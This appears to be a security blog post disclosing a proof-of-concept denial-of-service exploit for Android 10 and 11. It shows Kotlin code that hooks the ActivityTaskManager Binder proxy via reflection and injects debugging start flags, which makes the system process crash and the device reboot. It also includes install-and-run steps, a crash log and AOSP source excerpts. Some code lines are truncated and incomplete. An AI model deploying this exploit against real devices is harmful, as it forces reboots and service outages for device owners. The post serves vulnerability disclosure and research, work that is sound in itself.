StartFlag temporary DoS Exploit


The ActivityManagerService ( is a component of Android that manages the Running Applications, non-system Services, ContentProviders and much more. The StartFlag DoS Exploit sends a manipulated startActivity event telling to start another Application in “native debugging” mode (in our Test we use the PermissionGrant Activtiy wich is marked as not debuggable”. A bug in the ActivityManagerService doesn’t answer with forwarding a SecurityException to the Attacker, instead it throws the SecurityException without catching it. This causes the ActivityManagerService to crash and all other Services depending on it also die.

Download the POC

  1. Download the APK (download link above)
  2. Install the APK on you’re Android 10 / Android 11 device
  3. Click on “Test Exploit” button
  4. You’re device should reboot!
  5. Leave a comment and you’re device model to have an overview of affected devices 😉

Technical Description

In the POC we install a Binder hook using the Reflection Proxy class (Github: We replace the IActivityTaskManager object inside the IActivityTaskManagerSingelton of ActivityTaskManager.

val activityTaskManagerClazz =
val iActivityTaskManagerSingletonField =
iActivityTaskManagerSingletonField.isAccessible = true
val iActivityTaskManagerSingleton = iActivityTaskManagerSingletonField[null]
val singletonClazz = Class.forName("android.util.Singleton")
val mInstanceField = singletonClazz.getDeclaredField("mInstance")
mInstanceField.isAccessible = true
val mInstanceObject = mInstanceField[iActivityTaskManagerSingleton]
val iActivityTaskManagerClazz =
val mInstanceFieldProxy = Proxy.newProxyInstance(
// set the variables that are proxied
mInstanceField[iActivityTaskManagerSingleton] = mInstanceFieldProxy

Now we have to define a handler that searches for the argument defining the “startFlags” for this “startActivity” call. The arguments of this event can be learned using the class (;bpv=1;bpt=0). The “startFlags” integer decides whether the target activity shall be started in debug mode or not. We set the START_FLAG_NATIVE_DEBUGGING flag in order to tell we’re going to launch the target Activity in debug mode.

            val handler =
            InvocationHandler { _, method, args ->
                if ("startActivity" == {
                    if (args[args.size - 3].toString() == "0") {
                        // rewrite 「requestCode」in args to set 「START_FLAG_NATIVE_DEBUGGING」 flag
                        // when we start a non debuggable activity,
                        // 「setNativeDebuggingAppLocked」 will throw an SecurityException
                        // and then crash
                        args[args.size - 3] = args[args.size - 3] as Int or
                                START_FLAG_DEBUG or
                                START_FLAG_TRACK_ALLOCATION or
                method.invoke(mInstanceObject, *args)

The last step now is to launch an Activity which isn’t debuggable. For this we just use the standard requestPermission call.

         * Launch any non debuggable activity.

That’s it!

This will cause a crash shown in the video. Here is the Stacktrace of the remote process.

2020-05-04 00:57:51.065 1433-1433/? I/BinderHook: BinderHook [+] send manipulated startActivity() call
2020-05-04 00:57:51.066 24771-24793/? I/ActivityManager: Force stopping appid=10182 user=-1: set debug app
2020-05-04 00:57:51.068 24771-24793/? E/AndroidRuntime: *** FATAL EXCEPTION IN SYSTEM PROCESS: android.display
    java.lang.SecurityException: Process not debuggable:
        at$$Lambda$8ew6SY_v_7ex9pwFGDswbkGWuXc.accept(Unknown Source:14)
        at android.os.Handler.handleCallback(
        at android.os.Handler.dispatchMessage(
        at android.os.Looper.loop(

What happens in the ACTIVITY Manager Service?

The AccessibilityManagerService tries to setup the startActivtiy call and parses our given startFlags using the setDebugFlagsForStartingActivity method (see

        public void setDebugFlagsForStartingActivity(ActivityInfo aInfo, int startFlags,
                ProfilerInfo profilerInfo, Object wmLock) {
            synchronized (ActivityManagerService.this) {
                 * This function is called from the window manager context and needs to be executed
                 * synchronously.  To avoid deadlock, we pass a message to AMS to execute the
                 * function and notify the passed in lock when it has been completed.
                synchronized (wmLock) {
                    if ((startFlags & ActivityManager.START_FLAG_DEBUG) != 0) {
                        setDebugApp(aInfo.processName, true, false);
                    if ((startFlags & ActivityManager.START_FLAG_NATIVE_DEBUGGING) != 0) {
                        setNativeDebuggingAppLocked(aInfo.applicationInfo, aInfo.processName);
                    if ((startFlags & ActivityManager.START_FLAG_TRACK_ALLOCATION) != 0) {
                        setTrackAllocationApp(aInfo.applicationInfo, aInfo.processName);
                    if (profilerInfo != null) {
                        setProfileApp(aInfo.applicationInfo, aInfo.processName, profilerInfo);

Because we added the START_FLAG_NATIVE_DEBUGGING flag the setNativeDebuggingAppLocked will be called. This function checks if “ro.debug” is set in On non rooted devices this will be false and the function verifies if the target Application is marked as “debuggable” in his AndroidManifest.xml (this information was parced into the ApplicationInfo object).

Because our target Application is not “debuggable” the SecurityException will be thrown (see

    void setNativeDebuggingAppLocked(ApplicationInfo app, String processName) {
        boolean isDebuggable = "1".equals(SystemProperties.get(SYSTEM_DEBUGGABLE, "0"));
        if (!isDebuggable) {
            if ((app.flags & ApplicationInfo.FLAG_DEBUGGABLE) == 0) {
                throw new SecurityException("Process not debuggable: " + app.packageName);
        mNativeDebuggingApp = processName;

The reason why this exception will not be forwarded to the caller via the binder interface is that a new thread was spawned while perform this action (see

                        final Message msg = PooledLambda.obtainMessage(
                                mService.mAmInternal, aInfo, startFlags, profilerInfo,

Thanks for reading! If you like my work, please buy me a coffee 😉

See Also

One comment

Leave a Reply

Your email address will not be published. Required fields are marked *